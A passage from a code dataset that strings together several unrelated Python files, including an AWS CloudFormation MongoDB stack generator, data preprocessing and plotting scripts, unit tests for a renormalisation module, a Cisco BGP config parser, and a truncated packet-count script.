template.add_resource(ec2_instance_func(DependsOn=previous_instance))\n else:\n instance = template.add_resource(ec2_instance_func())\n tcpstacks.create_disk_cloudwatch_alarm( template, Ref(instance), db_name, ops.email_topic_arn, fs_mounts)\n tcpstacks.create_memory_cloudwatch_alarm(template, Ref(instance), db_name, ops.email_topic_arn)\n\ndef create_cloudwatch_rule(template, ops, app_cfn_options):\n mongo_inst_ids = dict()\n insta_id_list = []\n for count,instance_names in enumerate(sorted(app_cfn_options.db_names)):\n insta_id = \"\".join([\"INST_ID\",str(count)])\n mongo_inst_ids[insta_id] = Ref(instance_names)\n insta_id_list.append(\"\".join([\"${\",insta_id,\"}\"]))\n for action in [\"Start\",\"Stop\"]:\n rule_name = \"\".join([\"CloudWatch\",action,\"Rule\"])\n if( action == \"Start\" ):\n cron_patn = \"cron(0 19 ? * 1-5 *)\"\n else:\n cron_patn = \"cron(0 7 ? * 2-6 *)\"\n mongo_inst_ids.update(ACTION = action, REGION = ops.aws_region)\n input_patn = dict( Action = \"${ACTION}\", Region = \"${REGION}\",\n Instances = insta_id_list)\n input_pattern = json.dumps(input_patn, sort_keys=True)\n input_string = Sub(input_pattern,**mongo_inst_ids)\n lambda_id = \"\".join([ops.app_name,\"MongoStartStopFunction\"])\n lambda_target = Target( \"LambdaTarget\",\n Arn = app_cfn_options.lambda_arn,\n Id = lambda_id,\n Input = input_string)\n cloudwatch_rule = template.add_resource(Rule( rule_name,\n Description = \"\".join([\"CloudWatch Event \",action,\" Rule for\",ops.app_name,\" Mongo\"]),\n ScheduleExpression = cron_patn,\n State = \"ENABLED\",\n Targets = [lambda_target] ))\n invoke_name = \"\".join([\"MongoLambdaInvoke\",action])\n lambda_invoke_permissions(template, invoke_name, app_cfn_options.lambda_arn, GetAtt(cloudwatch_rule,\"Arn\"))\n\ndef create_lambda_func(template, ops, app_cfn_options):\n deploy_bucket = ops.deploy_bucket\n deploy_env = ops.deploy_env\n app_name = ops.app_name\n\n self_log_action = create_iam.lambda_self_logging(app_name)\n lambda_mongo_start_stop_role = [\n self_log_action,\n create_iam.make_statement(\n actions = [\n awacs.ec2.StartInstances,\n awacs.ec2.StopInstances,\n awacs.logs.CreateLogGroup,\n awacs.logs.CreateLogStream,\n awacs.logs.PutLogEvents,\n ],\n resources = [\"*\"],\n )\n ]\n lambda_mongo_start_stop_iam = custom_funcs.lambda_iam(template, \"LambdaCronRole\", lambda_mongo_start_stop_role,)\n custom_funcs.check_lambda_code(ops.deploy_bucket, deploy_env, \"./create_cloudformation/lambdas/mongo_start_stop_lambda.py\", lib_files = [])\n lambda_func = custom_funcs.lambda_function(\n template,\n \"LambdaCronResource\",\n deploy_bucket = ops.deploy_bucket,\n local_file = \"./create_cloudformation/lambdas/mongo_start_stop_lambda.py\",\n iam_role = GetAtt(lambda_mongo_start_stop_iam,\"Arn\"),\n s3_prefix = deploy_env,\n )\n app_cfn_options.lambda_arn = GetAtt(lambda_func,\"Arn\")\n\ndef lambda_invoke_permissions(template, name, lambda_arn, source_arn):\n template.add_resource(\n awslambda.Permission(\n name,\n FunctionName = lambda_arn,\n Action = \"lambda:InvokeFunction\",\n Principal = \"events.amazonaws.com\",\n SourceArn = source_arn,\n )\n )\n\ndef create_record_set(template, ops, app_cfn_options, mongo_dbs, dbconfig_ip, count):\n record_set = mongo_dbs.split(\":\",1)[0]\n hosted_zone = record_set.split(\".\",1)[1]\n rec_set_name = \"\".join([\"MongoRecordSet\",str(count)])\n rec_set = template.add_resource(route53.RecordSetType( rec_set_name, Type = 'A',\n Name = record_set, TTL = 300,\n HostedZoneName = hosted_zone,\n ResourceRecords = [dbconfig_ip]))\n\ndef mongo_stack(template, ops, app_cfn_options, stack_name, stack_setup):\n\n app_nets = [val for key,val in sorted(ops.app_networks.items())]\n app_ports = set([val[1] for key,val in ops.port_map.items()])\n cf_params = app_cfn_options.cf_params\n stack_name = stack_setup['stack_name']\n\n mongo_subnets = dict()\n mongo_networks = stack_setup['networks']\n mongo_ports = stack_setup['ports']\n number_of_shards = stack_setup['number_of_shards']\n custom_mongo_rules = stack_setup['custom_rules']\n shard_userdata = stack_setup['shards_userdata']\n config_userdata = stack_setup['config_userdata']\n man_userdata = stack_setup['man_userdata']\n mongo_dbs = stack_setup['mongo_dbs']\n enableArbiter = stack_setup['enableArbiter']\n fs_mounts = stack_setup['fs_mounts']\n stack_resource_name = \"\".join([ops.app_name, stack_name])\n app_cfn_options.mongo_sg_name = ops.app_name+\"Sg\"+stack_name\n mongo_nets = [val for key,val in sorted(mongo_networks.items())]\n\n for az,cidr in sorted(mongo_networks.items()):\n net_name = \"\".join([ops.app_name,\"Sn\",stack_name,az])\n subnet = create.network.subnet(template, ops.vpc_id, net_name, cidr, ops.availability_zones[az],ops.billing_id,ops.deploy_env)\n mongo_subnets[az] = subnet\n create.network.routetable( template, ops.vpc_id, \"Route\"+net_name, subnet, nat_id = ops.nat_host_ids[az],\n vpn_id = ops.ofc_vpn_id, vpn_route = ops.vpn_route)\n mongo_nacl_factory = create.network.AclFactory(\n template,\n name = \"\".join([ops.app_name,\"NetAcl\",stack_name]),\n vpc_id = ops.vpc_id,\n in_networks = app_nets,\n in_ports = mongo_ports,\n out_ports = ops.out_ports,\n out_networks = app_nets,\n ssh_hosts = ops.get(\"deploy_hosts\"),\n )\n export_ref(\n template,\n export_name = \"\".join([ops.app_name,\"NetAcl\",stack_name]),\n value = Ref(\"\".join([ops.app_name,\"NetAcl\",stack_name])),\n desc = \" {stack} NetAcl \".format(stack=stack_resource_name)\n )\n\n for count,az in enumerate(sorted(mongo_subnets.keys())):\n assoc_name = stack_name+\"AclAssoc\"+az+str(count)\n subnet = mongo_subnets[az]\n create.network.assoc_nacl_subnet(template, assoc_name, mongo_nacl_factory.nacl, subnet)\n\n mongo_sg = create.network.sec_group(template,\n name = app_cfn_options.mongo_sg_name,\n in_networks = sorted(mongo_nets),\n in_ports = mongo_ports,\n out_ports = mongo_ports,\n ssh_hosts = ops.deploy_hosts,\n custom_rules = custom_mongo_rules,\n ops = ops,\n )\n export_ref(\n template,\n export_name = app_cfn_options.mongo_sg_name,\n value = mongo_sg,\n desc = \" {stack} Security Group\".format(stack=stack_resource_name)\n )\n\n app_cfn_options.mongo_subnets = mongo_subnets\n\n if (number_of_shards% 2 == 0):\n pass\n else:\n print(\"Error: Number of Shards should be Even - \",ops.number_of_shards)\n sys.exit(1)\n\n app_cfn_options.shard_names = []\n app_cfn_options.db_names = []\n db_ips = dict()\n previous_instance = None\n\n ## Create Mongo Arbiter, Secondary and Primary Shard\n i = 1\n while(i <= (number_of_shards/2)):\n j = 2\n while(j >= 1):\n az = \"az1\"\n\n if( j == 1):\n shrad_type = \"PS\"\n else:\n shrad_type = \"SS\"\n if enableArbiter :\n az = \"az2\"\n arbiter = \"\".join([ops.app_name,\"DBArbiter\",str(i)])\n ip_name = \"\".join([\"AR\",str(i),\"IP\"])\n add_instances(template, ops, app_cfn_options, arbiter, ip_name, \"t2.micro\", db_ips, shard_userdata, az, previous_instance, fs_mounts)\n previous_instance = arbiter\n db_ips[ip_name] = GetAtt(arbiter,\"PrivateIp\")\n\n shard_name = \"\".join([ops.app_name,\"DB\",shrad_type,str(i),str(j)])\n app_cfn_options.db_names.append(shard_name)\n app_cfn_options.shard_names.append(shard_name)\n ip_name = \"\".join([shrad_type,str(i),str(j),\"IP\"])\n add_instances(template, ops, app_cfn_options, shard_name, ip_name, \"r4.large\", db_ips, shard_userdata, az, previous_instance, fs_mounts)\n previous_instance = shard_name\n db_ips[ip_name] = GetAtt(shard_name,\"PrivateIp\")\n j -= 1\n i += 1\n\n\n ## Create Mongo Config\n cfg_count = 1\n i = 1\n db_ips[\"CFGRS\"] = mongo_dbs.rstrip(',')\n mongo_dbs = mongo_dbs.split(',')\n config_ip = []\n if enableArbiter:\n cfg_count = 3\n while ( i <= cfg_count ):\n az = \"\".join([\"az\",str(i)])\n dbconfig = \"\".join([\"dbconfig\",az])\n dbconfig_name = \"\".join([ops.app_name,\"DBConfig\",az])\n app_cfn_options[dbconfig] = dbconfig_name\n app_cfn_options.db_names.append(app_cfn_options[dbconfig])\n add_instances(template, ops, app_cfn_options, app_cfn_options[dbconfig], \"Config\", \"t2.micro\", db_ips, config_userdata, az, previous_instance, fs_mounts)\n previous_instance = dbconfig_name\n db_ips[\"\".join([\"CFGIP\",str(i)])] = GetAtt(dbconfig_name,\"PrivateIp\")\n config_ip.append(GetAtt(dbconfig_name,\"PrivateIp\"))\n create_record_set(template, ops, app_cfn_options, mongo_dbs[(i-1)], config_ip[(i-1)], i)\n i += 1\n\n\n\n ## Create Mongo Man\n man_count = 1\n i = 1\n if enableArbiter:\n man_count = 2\n while ( i <= man_count ):\n az = \"\".join([\"az\",str(i)])\n dbman = \"\".join([ops.app_name,\"DBMan\",az])\n app_cfn_options.db_names.append(dbman)\n add_instances(template, ops, app_cfn_options, dbman, \"Man\", \"m4.large\", db_ips, man_userdata, az, previous_instance, fs_mounts)\n previous_instance = dbman\n db_ips[\"\".join([\"MANIP\",str(i)])] = GetAtt(dbman,\"PrivateIp\")\n i += 1\n\n if not enableArbiter:\n app_cfn_options.dbconfig = dbconfig_name\n create_lambda_func(template, ops, app_cfn_options)\n create_cloudwatch_rule(template, ops, app_cfn_options)\n","repo_name":"gotropo/gotropo","sub_path":"create/mongo.py","file_name":"mongo.py","file_ext":"py","file_size_in_byte":15229,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"30755105823","text":"from importlib import resources\n\nimport pandas as pd\nfrom scipy.sparse import coo_matrix\n\n\ndef load_emotions() -> list[str]:\n with resources.open_text(\"emo_classifier.resources\", \"emotions.txt\") as fp:\n return [line.rstrip() for line in fp]\n\n\ndef vectorize_emotions(comma_separated_idx: str, emotions: list[str]) -> pd.Series:\n vector = pd.Series([0] * len(emotions), index=emotions)\n indices = [int(idx) for idx in comma_separated_idx.split(\",\")]\n for idx in indices:\n vector[idx] = 1\n return vector\n\n\ndef vectorize_series_of_emotions(s_csv: pd.Series, emotions: list[str]) -> pd.DataFrame:\n \"\"\"\n use this function if you want to process lots of comma separated emotions\n\n :param s_csv:\n :param emotions:\n :return: DataFrame[admiration, amusement, ..., neutral]\n \"\"\"\n data, row, col = [], [], []\n\n for i, vals in enumerate(s_csv):\n for val in vals.split(\",\"):\n data.append(1)\n row.append(i)\n col.append(int(val))\n\n sparse = coo_matrix((data, (row, col)), shape=(len(s_csv), len(emotions)))\n return pd.DataFrame(sparse.toarray(), columns=emotions, index=s_csv.index)\n","repo_name":"stdiff/emo-classifier","sub_path":"emo_classifier/emotion.py","file_name":"emotion.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24966502804","text":"\"\"\"Plotting the 8 KNN accuracy plots\"\"\"\nfrom utils.plots import load_data_from_csv_wrapper, add_subplot_axes\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nimport numpy as np\n\nfig = plt.figure(figsize=(10, 8.0))\nsubpos = [0.55, 0.3, 0.4, 0.3]\n\n\n# wrn, cifar10\ncsv_file = '/data/gilad/logs/ma_scores/wrn/cifar10/log_1444_070318_wrn_ma_score_wd_0.00078-SUPERSEED=07031800/data_for_figures/test___knn_score'\nsteps, values = load_data_from_csv_wrapper(csv_file)\nsteps = [steps[0]] + steps[10:]\nvalues = [values[0]] + values[10:]\nax2 = fig.add_subplot(111)\nax2.plot(steps, values, 'r')\nsubax2 = add_subplot_axes(ax2, subpos)\nsubax2.set_xticks([40000, 42000, 44000, 46000, 48000, 50000])\nsubax2.set_xticklabels(['40', '42', '44', '46', '48', '50'], fontdict={'fontsize': 13})\nsubax2.set_ylim([95, 95.3])\nsubax2.set_yticks([95, 95.3])\nsubax2.plot(steps[-11:], values[-11:], 'r')\nfor item in subax2.get_yticklabels():\n item.set_fontsize(13)\ncsv_file = '/data/gilad/logs/ma_scores/wrn/cifar10/log_1444_070318_wrn_ma_score_wd_0.00078-SUPERSEED=07031800/data_for_figures/test___score'\nsteps, values = load_data_from_csv_wrapper(csv_file)\nsteps = [steps[0]] + steps[10:]\nvalues = [values[0]] + values[10:]\nax2.plot(steps, values, 'black')\nsubax2.plot(steps[-11:], values[-11:], 'black')\nax2.set_ylim(bottom=0, top=110)\nax2.set_title('CIFAR-10')\nax2.yaxis.grid()\nax2.set_xticks([0, 10000, 20000, 30000, 40000, 50000])\nax2.set_xticklabels(['0', '10', '20', '30', '40', '50'], fontdict={'fontsize': 13})\nax2.set_xlabel('Thousands of train steps', fontdict={'fontsize': 13})\nax2.set_ylabel('test accuracy (%)', fontdict={'fontsize': 14})\nfor item in ax2.get_yticklabels():\n item.set_fontsize(13)\nax2.add_patch(patches.Polygon(xy=np.array([[40000, 99], [27513.4, 65.6], [49732, 65.6], [49732, 32.2], [50000, 90]]), closed=True, color='silver'))\nax2.add_patch(patches.Rectangle(xy=(40000, 90), width=10000, height=10, facecolor='moccasin'))\n\nax2.legend(['k-NN', 'DNN'], loc=(0.05, 0.86), prop={'size': 16})\n# plt.show()\nplt.savefig('knn_dnn_accuracy_just_cifar10_vs_iter.png', dpi=350)\n","repo_name":"giladcohen/tensorflow_TB","sub_path":"plots/old/knn_accuracy_plots_just_cifar10.py","file_name":"knn_accuracy_plots_just_cifar10.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"32478669525","text":"\"\"\"\nImplement the preprocessing steps (EDA, upsampling... also include) prior\nto model training.\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom typing import Tuple, Any\nfrom sklearn.impute import KNNImputer\nfrom sklearn.preprocessing import OneHotEncoder\nimport matplotlib.pyplot as plt\n\n# customer_id: dataframe's index\nonehot_features = ['education_level', 'marital_status', 'income_category',\n 'card_class']\n\ninteger_features = ['customer_age', 'number_products_customer', 'weeks_tenure',\n 'contacts_last_12mths', 'inactive_months_last_12mths',\n 'count_transactions']\nfloat_features = ['credit_limit', 'total_revolving_balance',\n 'transactions_amount', 'change_transaction_amt_last_3mths',\n 'change_transaction_count_last_3mths']\nnumeric_features = integer_features + float_features\n\n# ############################################################################\n# EXPLORATORY DATA ANALYSIS\n# ############################################################################\n\n\ndef _perform_eda(train: pd.DataFrame) -> None:\n y = train['churn']\n plt.pie(np.c_[len(y) - np.sum(y), np.sum(y)][0],\n labels=['No churn', 'Churn'], colors=['g', 'r'], shadow=True,\n autopct='%.2f')\n fig = plt.gcf()\n fig.set_size_inches(6, 6)\n plt.show()\n\n _compute_nan_statistics(train)\n\n\n# ############################################################################\n# AUXILIARY FUNCTIONS\n# ############################################################################\n\ndef _reduce_mem_usage(df: pd.DataFrame, silent: bool = True,\n _integer_features: list = None) -> pd.DataFrame:\n \"\"\"\n Iterate through all the columns of a dataframe and modify the data type\n to reduce memory usage\n\n :param df: dataframe to be optimized\n :type df: pd.DataFrame\n :param silent: if False then it shows the difference of memory usage\n :type silent: bool\n\n :return: (pd.DataFrame) optimized dataframe\n \"\"\"\n start_mem = df.memory_usage().sum() / 1024 ** 2\n if not silent:\n print('Memory usage of dataframe is {:.2f} MB'.format(start_mem),\n flush=True)\n\n if _integer_features is None:\n _integer_features = integer_features\n\n for col in integer_features:\n df[col] = df[col].convert_dtypes(int)\n\n for col in df.columns:\n col_type = df[col].dtype\n\n if col_type != object:\n c_min = df[col].min()\n c_max = df[col].max()\n if str(col_type)[:3] == 'int':\n if c_min > np.iinfo(np.int8).min and \\\n c_max < np.iinfo(np.int8).max:\n df[col] = df[col].astype(np.int8)\n elif c_min > np.iinfo(np.int16).min and \\\n c_max < np.iinfo(np.int16).max:\n df[col] = df[col].astype(np.int16)\n elif c_min > np.iinfo(np.int32).min and \\\n c_max < np.iinfo(np.int32).max:\n df[col] = df[col].astype(np.int32)\n elif c_min > np.iinfo(np.int64).min and \\\n c_max < np.iinfo(np.int64).max:\n df[col] = df[col].astype(np.int64)\n else:\n # We avoid using float16...\n if c_min > np.finfo(np.float32).min and \\\n c_max < np.finfo(np.float32).max:\n df[col] = df[col].astype(np.float32)\n else:\n df[col] = df[col].astype(np.float64)\n else:\n df[col] = df[col].astype('category')\n\n end_mem = df.memory_usage().sum() / 1024 ** 2\n if not silent:\n print('Memory usage after optimization is: {:.2f} MB'.format(end_mem),\n '\\nDecreased by {:.1f}%'.format(\n 100 * (start_mem - end_mem) / start_mem), flush=True)\n\n return df\n\n\n# ONEHOT ENCODING\n\ndef _generate_onehot(df: pd.DataFrame) -> Tuple[pd.DataFrame, OneHotEncoder]:\n \"\"\"\n Usage:\n :param df: dataframe containing all the features that are desired to be one-hot encoded\n :return: one-hot encoded features\n \"\"\"\n # NaN values has their own category which will be also encoded\n # return pd.get_dummies(df.fillna('NaN'), prefix=df.columns)\n oh_encoder = OneHotEncoder()\n _encoded_df = oh_encoder.fit_transform(df.fillna('NaN'))\n df = pd.DataFrame(\n _encoded_df.toarray(),\n columns=oh_encoder.get_feature_names_out(df.columns),\n index=df.index)\n return df, oh_encoder\n\n\ndef _impute_missing_data(features: pd.DataFrame) -> Tuple[pd.DataFrame, Any]: # mainly for the customer age\n imp = KNNImputer(n_neighbors=10)\n _imputed_features = imp.fit_transform(features)\n if not isinstance(_imputed_features, pd.DataFrame):\n _imputed_features = pd.DataFrame(\n _imputed_features, columns=features.columns, index=features.index)\n return _imputed_features, imp\n\n\ndef _compute_nan_statistics(data: pd.DataFrame) -> pd.DataFrame:\n statistics = pd.DataFrame()\n\n # we add the percentage of samples affected by nan for each variable...\n statistics['% samples w/ nan'] = 100 * data.apply(\n lambda x: pd.isna(x)).sum(axis=0) / len(data)\n\n # now we generate columns indicating how likely is each variable\n # to present nan in a sample where are n nans in total,\n # for n=2,...,N_max where N_max is the number of features that\n # presents nan at least for some sample.\n\n n_max = np.count_nonzero(statistics > 0.)\n for n in range(2, n_max):\n more_than_one_nan = np.where(pd.isna(data), 1, 0)\n mask = (np.sum(more_than_one_nan, axis=1) - (n-1)).reshape(-1, 1)\n more_than_one_nan = np.where(more_than_one_nan * mask > 0.,\n more_than_one_nan, 0.)\n more_than_one_nan = 100 * pd.DataFrame(data=more_than_one_nan,\n columns=data.columns,\n index=data.index).mean(axis=0)\n statistics[f\"% samples w/ {n} nan\"] = more_than_one_nan\n\n return statistics\n\n\ndef __are_the_same_categories(train: pd.DataFrame, test: pd.DataFrame) -> bool:\n \"\"\"\n Usage:\n _same_categories = __are_the_same_categories(\n pd.read_csv('input/train.csv', index_col=0),\n pd.read_csv('input/test.csv', index_col=0))\n :param train: raw training dataframe\n :param test: raw test dataframe\n :return: True if there are exactly the same categories for every\n categorical features in both dataframes\n \"\"\"\n try:\n for col in onehot_features:\n _train_categories = pd.unique(train[col])\n _test_categories = pd.unique(test[col])\n assert set(list(_train_categories)) == set(list(_test_categories)), \\\n f\"There are different categories in both sets. \" \\\n f\"Train: {_train_categories}. Test: {_test_categories} \"\n except AssertionError:\n return False\n return True\n\n\ndef data_preprocessing() -> Tuple[pd.DataFrame, pd.DataFrame]:\n train = pd.read_csv('input/train.csv', index_col=0)\n test = pd.read_csv('input/test.csv', index_col=0)\n\n _onehot_train, oh_encoder = _generate_onehot(train[onehot_features])\n train = pd.concat(\n [train.drop(onehot_features, axis=1, inplace=False),\n _onehot_train], axis=1)\n\n _onehot_test = pd.DataFrame(\n oh_encoder.transform(test[onehot_features].fillna('NaN')).toarray(),\n columns=oh_encoder.get_feature_names_out(onehot_features),\n index=test.index)\n test = pd.concat(\n [test.drop(onehot_features, axis=1, inplace=False),\n _onehot_test], axis=1)\n\n # print(_compute_nan_statistics(test))\n train_features = train[[c_ for c_ in train.columns if str(c_) != 'churn']]\n train_features, _imputer = _impute_missing_data(train_features)\n train = pd.concat([train_features, train[['churn']]], axis=1)\n\n test = pd.DataFrame(\n _imputer.transform(test), columns=test.columns, index=test.index)\n\n # print(_compute_nan_statistics(test))\n return train, test\n\n\nif __name__ == '__main__':\n train, test = data_preprocessing()\n train.to_csv('input/preprocessed/train.csv', index=True)\n test.to_csv('input/preprocessed/test.csv', index=True)\n","repo_name":"gcastro-98/immune-datathon","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":8322,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"71619535624","text":"import unittest\r\nimport logging\r\nimport os\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nimport cmapPy.pandasGEXpress as GCToo\r\nimport cmapPy.pandasGEXpress.parse as parse\r\nimport broadinstitute_psp.utils.setup_logger as setup_logger\r\nimport broadinstitute_psp.tear.continuous_renormalization as renorm\r\n\r\n# Setup logger\r\nlogger = logging.getLogger(setup_logger.LOGGER_NAME)\r\n\r\n# Use functional tests assets from the tear directory\r\nif os.path.basename(os.getcwd()) == \"tear\":\r\n FUNCTIONAL_TESTS_DIR = os.path.join(\"./functional_tests\")\r\nelif os.path.basename(os.getcwd()) == \"broadinstitute_psp\":\r\n FUNCTIONAL_TESTS_DIR = os.path.join(\"tear/functional_tests\")\r\n\r\nclass TestContinuousRenormalization(unittest.TestCase):\r\n\r\n\r\n def test_main(self):\r\n in_gct_path = os.path.join(FUNCTIONAL_TESTS_DIR, \"test_renorm_main.gct\")\r\n out_name = os.path.join(FUNCTIONAL_TESTS_DIR, \"test_renorm_out.gct\")\r\n\r\n # update the args string\r\n args_string = (\"-i {} -o {} -gct\").format(in_gct_path, out_name)\r\n args = renorm.build_parser().parse_args(args_string.split())\r\n renorm.continuous_renormalization(args)\r\n\r\n # Read in result\r\n out_gct = parse.parse(out_name)\r\n\r\n e_values = np.array(\r\n [[-0.41, -0.13, 0.07, 0.09, 0.18, 0.24, 0.08],\r\n [0.40, 0.11, 0.06, -0.11, -0.22, -0.26, -0.09],\r\n [0.40, -0.40, 0.30, -0.20, 0.05, -0.10, 0.10],\r\n [0.10, 0.06, -0.07, 0.05, -0.09, 0.08, 0.10]])\r\n self.assertTrue(np.allclose(e_values, out_gct.data_df, atol=1e-2))\r\n\r\n # Clean up\r\n os.remove(out_name)\r\n \r\n \r\n def test_to_log_renorm(self):\r\n \r\n slopes = pd.Series([-0.3, 0.1, -0.1, 0.3])\r\n is_log_renormed_return = renorm.is_log_renormed(slopes, 0.2)\r\n is_log_renormed_expected = pd.Series([True, False, False, True])\r\n \r\n self.assertTrue((is_log_renormed_return == is_log_renormed_expected).all())\r\n \r\n \r\n def test_tot_samp_offsets(self):\r\n \r\n df_in = pd.DataFrame([[1, -1, 0, 1],\r\n [2, 0, -2, 2],\r\n [0, 0, 0, 0],\r\n [-0.5, 0.5, 0.5, 0]])\r\n return_tot_samp_offsets = renorm.calculate_total_sample_offsets(df_in)\r\n expect_tot_samp_offsets = pd.Series([3.5, 1.5, 2.5, 3])\r\n \r\n self.assertTrue(np.allclose(return_tot_samp_offsets,\r\n expect_tot_samp_offsets,\r\n atol=1e-6))\r\n \r\n \r\n def test_calc_out_mat(self):\r\n \r\n df_in = pd.DataFrame([[1, 2, 3, 4],\r\n [4, 3, 2, 1],\r\n [0, 0, 0, 0],\r\n [1, 1, 1, 1]])\r\n offset_in = pd.DataFrame([[0, 0, 0, 0],\r\n [3, 2, 1, 0],\r\n [0, 1, 2, 3],\r\n [0, 0, 0, 0]])\r\n return_out_df = renorm.calculate_out_matrix(df_in, offset_in)\r\n \r\n expect_out_df = pd.DataFrame([[1, 2, 3, 4],\r\n [1, 1, 1, 1],\r\n [0, -1, -2, -3],\r\n [1, 1, 1, 1]])\r\n \r\n self.assertTrue(np.allclose(return_out_df, expect_out_df,\r\n atol=1e-6))\r\n \r\n \r\n def test_calc_pep_samp_offsets(self):\r\n \r\n data_df_in = pd.DataFrame([[0.8, 0.6, 0.5, 0.36],\r\n [1, 1, 1, 1]])\r\n row_metadata_df_in = pd.DataFrame([[True, True],\r\n [False, False]],\r\n columns = [\"is_log_renormed\", \"whatever\"])\r\n es_in = pd.Series([0.2, 0.5, 0.6, 1.0])\r\n pep_y_offsets_in = pd.Series([0.4, 0])\r\n fit_params_in = pd.DataFrame([[(1, 1), (1, 1)],\r\n [(1, 1), (1, 1)]],\r\n columns = [\"deg1\", \"log\"])\r\n\r\n func_return = renorm.calculate_peptide_sample_offsets(data_df_in, row_metadata_df_in,\r\n es_in, fit_params_in,\r\n pep_y_offsets_in)\r\n \r\n expected_return = pd.DataFrame([[0.85, 0.78, 0.75, 0.67],\r\n [0, 0, 0, 0]])\r\n \r\n self.assertTrue(np.allclose(expected_return, func_return, atol=1e-2))\r\n \r\n \r\n def test_calc_fit(self):\r\n \r\n data_df_in = pd.DataFrame([[0.8, 0.6, 0.5, 0.36],\r\n [0.9, 1, 1, 1]])\r\n es_in = pd.Series([0.2, 0.5, 0.6, 1.0])\r\n pep_y_offsets_in = pd.Series([0.1, 0.1])\r\n \r\n func_return = renorm.calculate_fit(data_df_in, es_in, pep_y_offsets_in)\r\n\r\n expect_return = pd.DataFrame([[[-0.54, 0.88], (1.6, 1.66)],\r\n [[0.11, 0.91], (1.8, 0.03)]],\r\n columns=[\"deg1\", \"log\"])\r\n \r\n for row_idx, vals in expect_return.iterrows():\r\n for col_idx, vals in expect_return.iteritems():\r\n self.assertTrue(np.allclose(expect_return.loc[row_idx, col_idx],\r\n func_return.loc[row_idx, col_idx],\r\n atol=1e-2))\r\n \r\n \r\n def test_make_y(self):\r\n \r\n x_in = pd.Series([0.1, 0.3, 0.5, 0.8])\r\n deg_model = [1, 1]\r\n log_model = (1, 1)\r\n \r\n deg_return = renorm.make_y(x_in, deg_model)\r\n log_return = renorm.make_y(x_in, log_model, 1)\r\n \r\n expect_deg_return = pd.Series([1, 1, 1, 1])\r\n expect_log_return = pd.Series([1.47, 1.42, 1.37, 1.31])\r\n \r\n self.assertTrue(np.allclose(deg_return, expect_deg_return, atol=1e-2))\r\n self.assertTrue(np.allclose(log_return, expect_log_return, atol=1e-2))\r\n \r\n \r\n def test_calc_y_offsets(self):\r\n \r\n df_in = pd.DataFrame([[ 1, 2, 3, 4, 5],\r\n [ 4, 3, 2, 1, 0],\r\n [ 0, 0, 0, 0, 0],\r\n [-1, -1, -1, -1, -1]])\r\n es = pd.Series([1, 0.2, 0.3, 0.4, 0.5])\r\n \r\n return_y_offsets = renorm.calculate_y_offsets(df_in, es)\r\n expect_y_offsets = pd.Series([1, 4, 0, -1])\r\n \r\n self.assertTrue(np.allclose(return_y_offsets, expect_y_offsets,\r\n atol=1e-6))\r\n \r\n return_y_offsets = renorm.calculate_y_offsets(df_in, es, top_fraction=1.0)\r\n expect_y_offsets = pd.Series([3, 2, 0, -1])\r\n \r\n self.assertTrue(np.allclose(return_y_offsets, expect_y_offsets,\r\n atol=1e-6))\r\n \r\n \r\n\r\nif __name__ == \"__main__\":\r\n setup_logger.setup(verbose=True)\r\n unittest.main()\r\n","repo_name":"cmap/psp","sub_path":"broadinstitute_psp/tear/test_continuous_renormalization.py","file_name":"test_continuous_renormalization.py","file_ext":"py","file_size_in_byte":7073,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"81"} +{"seq_id":"8971935059","text":"from ciscoconfparse import CiscoConfParse\n\nbgp = []\n\nfile = open(\"bgp_config.txt\")\noutput = file.read()\nfile.close() \n\nparsed = CiscoConfParse(output.splitlines())\n\nbgp_conf = parsed.find_objects(r\"^router bgp\")\nbgp_peer = bgp_conf[0].re_search_children(r\"^\\s+neighbor\")\n\nfor x in bgp_peer:\n print(x.text)\n remote_as = x.re_search_children(r\"^\\s+remote-as\")\n print(remote_as[0].text)\n print(\"***\")\n bgp.append((x.text,remote_as[0].text))\n\nprint(bgp)\n\n\n\n\n\n\n","repo_name":"bartd20/data-structures","sub_path":"ex7.py","file_name":"ex7.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17838204646","text":"import pyshark\nimport matplotlib.pyplot as plt\n\n# Capture des données\ncap1 = pyshark.FileCapture('../Captures/test_2_v2.pcapng', only_summaries=False) # fichiers\ncap2 = pyshark.FileCapture('../Captures/test_3_v2.pcapng', only_summaries=False) # vidéos\ncap3 = pyshark.FileCapture('../Captures/test_4_v2.pcapng', only_summaries=False) # vocal\n\n# Temps de début pour chaque capture\nstart_time1 = 0\nstart_time2 = 0\nstart_time3 = 0\n#start_time4 = 0\n#time_to_compute = 100\n\n# Initialisation des variables\ndata1 = {}\ndata2 = {}\ndata3 = {}\n#data4 = {}\n\n\n# Capture des données pour chaque capture\nfor packet in cap1:\n #if float(packet.frame_info.time_relative) >= start_time1 and float(packet.frame_info.time_relative) <= (start_time1 + time_to_compute):\n time = int(float(packet.frame_info.time_relative) - start_time1)\n if time in data1:\n data1[time] += 1\n else:\n data1[time] = 1\n #elif float(packet.frame_info.time_relative) > (start_time1 + time_to_compute):\n # break\n\n\nfor packet in cap2:\n #if float(packet.frame_info.time_relative) >= start_time2 and float(packet.frame_info.time_relative) <= (start_time2 + time_to_compute):\n time = int(float(packet.frame_info.time_relative) - start_time2)\n if time in data2:\n data2[time] += 1\n else:\n data2[time] = 1\n #elif float(packet.frame_info.time_relative) > (start_time2 + time_to_compute):\n # break\n\n\nfor packet in cap3:\n #if float(packet.frame_info.time_relative) >= start_time3 and float(packet.frame_info.time_relative) <= (start_time3 + time_to_compute):\n time = int(float(packet.frame_info.time_relative) - start_time3)\n if time in data3:\n data3[time] += 1\n else:\n data3[time] = 1\n #elif float(packet.frame_info.time_relative) > (start_time3 + time_to_compute):\n # break\n\n#for packet in cap4:\n #if 